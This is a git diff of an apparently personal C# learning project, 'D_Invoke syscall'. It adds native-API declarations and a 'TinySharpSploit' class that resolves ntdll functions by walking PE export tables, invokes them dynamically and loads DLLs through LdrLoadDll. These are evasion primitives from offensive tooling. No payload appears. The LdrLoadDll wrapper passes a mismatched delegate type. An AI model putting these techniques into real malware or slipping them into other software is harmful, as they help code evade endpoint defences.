WINSTA_READATTRIBUTES = 0x00000002,
|
||||
WINSTA_ACCESSCLIPBOARD = 0x00000004,
|
||||
WINSTA_CREATEDESKTOP = 0x00000008,
|
||||
WINSTA_WRITEATTRIBUTES = 0x00000010,
|
||||
WINSTA_ACCESSGLOBALATOMS = 0x00000020,
|
||||
WINSTA_EXITWINDOWS = 0x00000040,
|
||||
WINSTA_ENUMERATE = 0x00000100,
|
||||
WINSTA_READSCREEN = 0x00000200,
|
||||
WINSTA_ALL_ACCESS = 0x0000037F
|
||||
}
|
||||
|
||||
// http://pinvoke.net/default.aspx/Structures/UNICODE_STRING.html
|
||||
// NtCreateThread - POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL
|
||||
[StructLayout(LayoutKind.Sequential)]
|
||||
public struct UNICODE_STRING : IDisposable
|
||||
{
|
||||
public ushort Length;
|
||||
public ushort MaximumLength;
|
||||
private IntPtr buffer;
|
||||
|
||||
public UNICODE_STRING(string s)
|
||||
{
|
||||
Length = (ushort)(s.Length * 2);
|
||||
MaximumLength = (ushort)(Length + 2);
|
||||
buffer = Marshal.StringToHGlobalUni(s);
|
||||
}
|
||||
|
||||
public void Dispose()
|
||||
{
|
||||
Marshal.FreeHGlobal(buffer);
|
||||
buffer = IntPtr.Zero;
|
||||
}
|
||||
|
||||
public override string ToString()
|
||||
{
|
||||
return Marshal.PtrToStringUni(buffer);
|
||||
}
|
||||
}
|
||||
|
||||
// http://www.pinvoke.net/default.aspx/Structures/OBJECT_ATTRIBUTES.html
|
||||
// NtCreateThread - POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL
|
||||
public struct OBJECT_ATTRIBUTES : IDisposable
|
||||
{
|
||||
public int Length;
|
||||
public IntPtr RootDirectory;
|
||||
private IntPtr objectName;
|
||||
public uint Attributes;
|
||||
public IntPtr SecurityDescriptor;
|
||||
public IntPtr SecurityQualityOfService;
|
||||
|
||||
public OBJECT_ATTRIBUTES(string name, uint attrs)
|
||||
{
|
||||
Length = 0;
|
||||
RootDirectory = IntPtr.Zero;
|
||||
objectName = IntPtr.Zero;
|
||||
Attributes = attrs;
|
||||
SecurityDescriptor = IntPtr.Zero;
|
||||
SecurityQualityOfService = IntPtr.Zero;
|
||||
|
||||
Length = Marshal.SizeOf(this);
|
||||
ObjectName = new UNICODE_STRING(name);
|
||||
}
|
||||
|
||||
public UNICODE_STRING ObjectName
|
||||
{
|
||||
get
|
||||
{
|
||||
return (UNICODE_STRING)Marshal.PtrToStructure(
|
||||
objectName, typeof(UNICODE_STRING));
|
||||
}
|
||||
|
||||
set
|
||||
{
|
||||
bool fDeleteOld = objectName != IntPtr.Zero;
|
||||
if (!fDeleteOld)
|
||||
objectName = Marshal.AllocHGlobal(Marshal.SizeOf(value));
|
||||
Marshal.StructureToPtr(value, objectName, fDeleteOld);
|
||||
}
|
||||
}
|
||||
|
||||
public void Dispose()
|
||||
{
|
||||
if (objectName != IntPtr.Zero)
|
||||
{
|
||||
Marshal.DestroyStructure(objectName, typeof(UNICODE_STRING));
|
||||
Marshal.FreeHGlobal(objectName);
|
||||
objectName = IntPtr.Zero;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// http://www.pinvoke.net/default.aspx/kernel32/VirtualProtectEx.html
|
||||
// For making memory RX
|
||||
[DllImport("kernel32.dll")]
|
||||
public static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
|
||||
|
||||
// http://www.pinvoke.net/default.aspx/kernel32/VirtualProtect.html
|
||||
// For making memory RX
|
||||
public enum AllocationProtect : uint
|
||||
{
|
||||
PAGE_EXECUTE = 0x00000010,
|
||||
PAGE_EXECUTE_READ = 0x00000020,
|
||||
PAGE_EXECUTE_READWRITE = 0x00000040,
|
||||
PAGE_EXECUTE_WRITECOPY = 0x00000080,
|
||||
PAGE_NOACCESS = 0x00000001,
|
||||
PAGE_READONLY = 0x00000002,
|
||||
PAGE_READWRITE = 0x00000004,
|
||||
PAGE_WRITECOPY = 0x00000008,
|
||||
PAGE_GUARD = 0x00000100,
|
||||
PAGE_NOCACHE = 0x00000200,
|
||||
PAGE_WRITECOMBINE = 0x00000400
|
||||
}
|
||||
|
||||
// http://www.pinvoke.net/default.aspx/kernel32/GetCurrentProcess.html
|
||||
// For getting a handle to the current process
|
||||
[DllImport("kernel32.dll", SetLastError = true)]
|
||||
public static extern IntPtr GetCurrentProcess();
|
||||
|
||||
[DllImport("Kernel32.dll", SetLastError = true)]
|
||||
public static extern uint GetThreadId(IntPtr hThread);
|
||||
}
|
||||
|
||||
public class TinySharpSploit
|
||||
{
|
||||
public static Native.NTSTATUS LdrLoadDll(IntPtr PathToFile, UInt32 dwFlags, ref Native.UNICODE_STRING ModuleFileName, ref IntPtr ModuleHandle)
|
||||
{
|
||||
// Craft an array for the arguments
|
||||
object[] funcargs =
|
||||
{
|
||||
PathToFile, dwFlags, ModuleFileName, ModuleHandle
|
||||
};
|
||||
|
||||
Native.NTSTATUS retValue = (Native.NTSTATUS)DynamicAPIInvoke(@"ntdll.dll", @"LdrLoadDll", typeof(Delegates.RtlInitUnicodeString), ref funcargs);
|
||||
|
||||
// Update the modified variables
|
||||
ModuleHandle = (IntPtr)funcargs[3];
|
||||
|
||||
return retValue;
|
||||
}
|
||||
|
||||
public static void RtlInitUnicodeString(ref Native.UNICODE_STRING DestinationString, [MarshalAs(UnmanagedType.LPWStr)] string SourceString)
|
||||
{
|
||||
// Craft an array for the arguments
|
||||
object[] funcargs =
|
||||
{
|
||||
DestinationString, SourceString
|
||||
};
|
||||
|
||||
DynamicAPIInvoke(@"ntdll.dll", @"RtlInitUnicodeString", typeof(Delegates.RtlInitUnicodeString), ref funcargs);
|
||||
|
||||
// Update the modified variables
|
||||
DestinationString = (Native.UNICODE_STRING)funcargs[0];
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Dynamically invoke an arbitrary function from a DLL, providing its name, function prototype, and arguments.
|
||||
/// </summary>
|
||||
/// <author>The Wover (@TheRealWover)</author>
|
||||
/// <param name="DLLName">Name of the DLL.</param>
|
||||
/// <param name="FunctionName">Name of the function.</param>
|
||||
/// <param name="FunctionDelegateType">Prototype for the function, represented as a Delegate object.</param>
|
||||
/// <param name="Parameters">Parameters to pass to the function. Can be modified if function uses call by reference.</param>
|
||||
/// <returns>Object returned by the function. Must be unmarshalled by the caller.</returns>
|
||||
public static object DynamicAPIInvoke(string DLLName, string FunctionName, Type FunctionDelegateType, ref object[] Parameters)
|
||||
{
|
||||
IntPtr pFunction = GetLibraryAddress(DLLName, FunctionName);
|
||||
return DynamicFunctionInvoke(pFunction, FunctionDelegateType, ref Parameters);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Dynamically invokes an arbitrary function from a pointer. Useful for manually mapped modules or loading/invoking unmanaged code from memory.
|
||||
/// </summary>
|
||||
/// <author>The Wover (@TheRealWover)</author>
|
||||
/// <param name="FunctionPointer">A pointer to the unmanaged function.</param>
|
||||
/// <param name="FunctionDelegateType">Prototype for the function, represented as a Delegate object.</param>
|
||||
/// <param name="Parameters">Arbitrary set of parameters to pass to the function. Can be modified if function uses call by reference.</param>
|
||||
/// <returns>Object returned by the function. Must be unmarshalled by the caller.</returns>
|
||||
public static object DynamicFunctionInvoke(IntPtr FunctionPointer, Type FunctionDelegateType, ref object[] Parameters)
|
||||
{
|
||||
Delegate funcDelegate = Marshal.GetDelegateForFunctionPointer(FunctionPointer, FunctionDelegateType);
|
||||
return funcDelegate.DynamicInvoke(Parameters);
|
||||
}
|
||||
|
||||
|
||||
/// <summary>
|
||||
/// Resolves LdrLoadDll and uses that function to load a DLL from disk.
|
||||
/// </summary>
|
||||
/// <author>Ruben Boonen (@FuzzySec)</author>
|
||||
/// <param name="DLLPath">The path to the DLL on disk. Uses the LoadLibrary convention.</param>
|
||||
/// <returns>IntPtr base address of the loaded module or IntPtr.Zero if the module was not loaded successfully.</returns>
|
||||
public static IntPtr LoadModuleFromDisk(string DLLPath)
|
||||
{
|
||||
Native.UNICODE_STRING uModuleName = new Native.UNICODE_STRING();
|
||||
RtlInitUnicodeString(ref uModuleName, DLLPath);
|
||||
|
||||
IntPtr hModule = IntPtr.Zero;
|
||||
Native.NTSTATUS CallResult = LdrLoadDll(IntPtr.Zero, 0, ref uModuleName, ref hModule);
|
||||
if (CallResult != Native.NTSTATUS.Success || hModule == IntPtr.Zero)
|
||||
{
|
||||
return IntPtr.Zero;
|
||||
}
|
||||
|
||||
return hModule;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Helper for getting the base address of a module loaded by the current process. This base
|
||||
/// address could be passed to GetProcAddress/LdrGetProcedureAddress or it could be used for
|
||||
/// manual export parsing. This function uses the .NET System.Diagnostics.Process class.
|
||||
/// </summary>
|
||||
/// <author>Ruben Boonen (@FuzzySec)</author>
|
||||
/// <param name="DLLName">The name of the DLL (e.g. "ntdll.dll").</param>
|
||||
/// <returns>IntPtr base address of the loaded module or IntPtr.Zero if the module is not found.</returns>
|
||||
public static IntPtr GetLoadedModuleAddress(string DLLName)
|
||||
{
|
||||
ProcessModuleCollection ProcModules = Process.GetCurrentProcess().Modules;
|
||||
foreach (ProcessModule Mod in ProcModules)
|
||||
{
|
||||
if (Mod.FileName.ToLower().EndsWith(DLLName.ToLower()))
|
||||
{
|
||||
return Mod.BaseAddress;
|
||||
}
|
||||
}
|
||||
return IntPtr.Zero;
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Helper for getting the pointer to a function from a DLL loaded by the process.
|
||||
/// </summary>
|
||||
/// <author>Ruben Boonen (@FuzzySec)</author>
|
||||
/// <param name="DLLName">The name of the DLL (e.g. "ntdll.dll" or "C:\Windows\System32\ntdll.dll").</param>
|
||||
/// <param name="FunctionName">Name of the exported procedure.</param>
|
||||
/// <param name="CanLoadFromDisk">Optional, indicates if the function can try to load the DLL from disk if it is not found in the loaded module list.</param>
|
||||
/// <returns>IntPtr for the desired function.</returns>
|
||||
public static IntPtr GetLibraryAddress(string DLLName, string FunctionName, bool CanLoadFromDisk = false)
|
||||
{
|
||||
IntPtr hModule = GetLoadedModuleAddress(DLLName);
|
||||
if (hModule == IntPtr.Zero && CanLoadFromDisk)
|
||||
{
|
||||
hModule = LoadModuleFromDisk(DLLName);
|
||||
if (hModule == IntPtr.Zero)
|
||||
{
|
||||
throw new FileNotFoundException(DLLName + ", unable to find the specified file.");
|
||||
}
|
||||
}
|
||||
else if (hModule == IntPtr.Zero)
|
||||
{
|
||||
throw new DllNotFoundException(DLLName + ", Dll was not found.");
|
||||
}
|
||||
|
||||
return GetExportAddress(hModule, FunctionName);
|
||||
}
|
||||
|
||||
/// <summary>
|
||||
/// Given a module base address, resolve the address of a function by manually walking the module export table.
|
||||
/// </summary>
|
||||
/// <author>Ruben Boonen (@FuzzySec)</author>
|
||||
/// <param name="ModuleBase">A pointer to the base address where the module is loaded in the current process.</param>
|
||||
/// <param name="ExportName">The name of the export to search for (e.g. "NtAlertResumeThread").</param>
|
||||
/// <returns>IntPtr for the desired function.</returns>
|
||||
public static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName)
|
||||
{
|
||||
IntPtr FunctionPtr = IntPtr.Zero;
|
||||
try
|
||||
{
|
||||
// Traverse the PE header in memory
|
||||
Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
|
||||
Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
|
||||
Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
|
||||
Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
|
||||
Int64 pExport = 0;
|
||||
if (Magic == 0x010b)
|
||||
{
|
||||
pExport = OptHeader + 0x60;
|
||||
}
|
||||
else
|
||||
{
|
||||
pExport = OptHeader + 0x70;
|
||||
}
|
||||
|
||||
// Read -> IMAGE_EXPORT_DIRECTORY
|
||||
Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
|
||||
Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
|
||||
Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
|
||||
Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
|
||||
Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
|
||||
Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
|
||||
Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
|
||||
|
||||
// Loop the array of export name RVA's
|
||||
for (int i = 0; i < NumberOfNames; i++)
|
||||
{
|
||||
string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4))));
|
||||
if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase))
|
||||
{
|
||||
Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
|
||||
Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
|
||||
FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
catch
|
||||
{
|
||||
// Catch parser failure
|
||||
throw new InvalidOperationException("Failed to parse module exports.");
|
||||
}
|
||||
|
||||
if (FunctionPtr == IntPtr.Zero)
|
||||
{
|
||||
// Export not found
|
||||
throw new MissingMethodException(ExportName + ", export not found.");
|
||||
}
|
||||
return FunctionPtr;
|
||||
}
|
||||
}
|
||||
}
|
|
@ -0,0 +1,36 @@
|
|||
using System.Reflection;
|
||||
using System.Runtime.CompilerServices;
|
||||
using System.Runtime.InteropServices;
|
||||
|
||||
// 有关程序集的一般信息由以下
|
||||
// 控制。更改这些特性值可修改
|
||||
// 与程序集关联的信息。
|
||||
[assembly: AssemblyTitle("D_Invoke syscall")]
|
||||
[assembly: AssemblyDescription("")]
|
||||
[assembly: AssemblyConfiguration("")]
|
||||
[assembly: AssemblyCompany("")]
|
||||
[assembly: AssemblyProduct("D_Invoke syscall")]
|
||||
[assembly: AssemblyCopyright("Copyright © 2021")]
|
||||
[assembly: AssemblyTrademark("")]
|
||||
[assembly: AssemblyCulture("")]
|
||||
|
||||
// 将 ComVisible 设置为 false 会使此程序集中的类型
|
||||
//对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型
|
||||
//请将此类型的 ComVisible 特性设置为 true。
|
||||
[assembly: ComVisible(false)]
|
||||
|
||||
// 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID
|
||||
[assembly: Guid("e1059ca6-33b6-4b4c-9070-a09cd05b11b2")]
|
||||
|
||||
// 程序集的版本信息由下列四个值组成:
|
||||
//
|
||||
// 主版本
|
||||
// 次版本
|
||||
// 生成号
|
||||
// 修订号
|
||||
//
|
||||
//可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值
|
||||
//通过使用 "*",如下所示:
|
||||
// [assembly: AssemblyVersion("1.0.*")]
|
||||
[assembly: AssemblyVersion("1.0.0.0")]
|
||||
[assembly: AssemblyFileVersion("1.0.0.0")]
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1 @@
|
|||
e1325d9359823d299d0045b0c998a6b88ab90897
|
|
@ -0,0 +1,6 @@
|
|||
E:\Learning Record\CSharp\D_Invoke syscall\obj\Debug\D_Invoke syscall.csprojAssemblyReference.cache
|
||||
E:\Learning Record\CSharp\D_Invoke syscall\obj\Debug\D_Invoke syscall.csproj.CoreCompileInputs.cache
|
||||
E:\Learning Record\CSharp\D_Invoke syscall\bin\Debug\D_Invoke syscall.exe
|
||||
E:\Learning Record\CSharp\D_Invoke syscall\bin\Debug\D_Invoke syscall.pdb
|
||||
E:\Learning Record\CSharp\D_Invoke syscall\obj\Debug\D_Invoke syscall.exe
|
||||
E:\Learning Record\CSharp\D_Invoke syscall\obj\Debug\D_Invoke syscall.pdb
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.